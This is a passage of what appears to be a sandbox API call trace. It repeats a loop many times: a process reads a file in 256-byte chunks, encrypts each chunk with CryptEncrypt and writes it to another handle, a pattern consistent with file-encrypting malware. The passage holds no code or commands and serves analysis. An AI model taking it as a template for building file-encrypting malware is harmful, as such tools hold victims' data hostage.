lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.257] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.257] GetLastError () returned 0x0 [0168.257] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.257] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.257] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.257] GetLastError () returned 0x0 [0168.257] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.257] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.257] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.257] GetLastError () returned 0x0 [0168.257] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.257] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.257] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.257] GetLastError () returned 0x0 [0168.257] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.257] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.257] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.258] GetLastError () returned 0x0 [0168.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.258] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.258] GetLastError () returned 0x0 [0168.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.258] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.258] GetLastError () returned 0x0 [0168.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.258] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.258] GetLastError () returned 0x0 [0168.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.258] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.258] GetLastError () returned 0x0 [0168.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.258] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.258] GetLastError () returned 0x0 [0168.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.259] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.259] GetLastError () returned 0x0 [0168.259] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.259] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.259] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.259] GetLastError () returned 0x0 [0168.259] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.259] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.259] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.259] GetLastError () returned 0x0 [0168.259] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.259] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.259] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.259] GetLastError () returned 0x0 [0168.259] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.259] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.259] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.259] GetLastError () returned 0x0 [0168.259] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.259] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.259] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.259] GetLastError () returned 0x0 [0168.259] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.259] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.259] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.259] GetLastError () returned 0x0 [0168.259] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.260] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.260] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.260] GetLastError () returned 0x0 [0168.260] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.260] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.260] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.260] GetLastError () returned 0x0 [0168.260] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.260] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.260] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.260] GetLastError () returned 0x0 [0168.260] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.260] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.260] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.260] GetLastError () returned 0x0 [0168.260] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.260] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.260] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.260] GetLastError () returned 0x0 [0168.260] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.260] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.260] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.260] GetLastError () returned 0x0 [0168.260] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.261] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.261] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.261] GetLastError () returned 0x0 [0168.261] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.261] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.261] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.261] GetLastError () returned 0x0 [0168.261] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.261] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.261] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.261] GetLastError () returned 0x0 [0168.261] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.261] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.261] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.261] GetLastError () returned 0x0 [0168.261] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.261] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.261] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.261] GetLastError () returned 0x0 [0168.261] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.261] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.261] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.261] GetLastError () returned 0x0 [0168.261] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.261] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.262] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.262] GetLastError () returned 0x0 [0168.262] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.262] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.262] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.262] GetLastError () returned 0x0 [0168.262] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.262] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.262] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.262] GetLastError () returned 0x0 [0168.262] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.262] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, 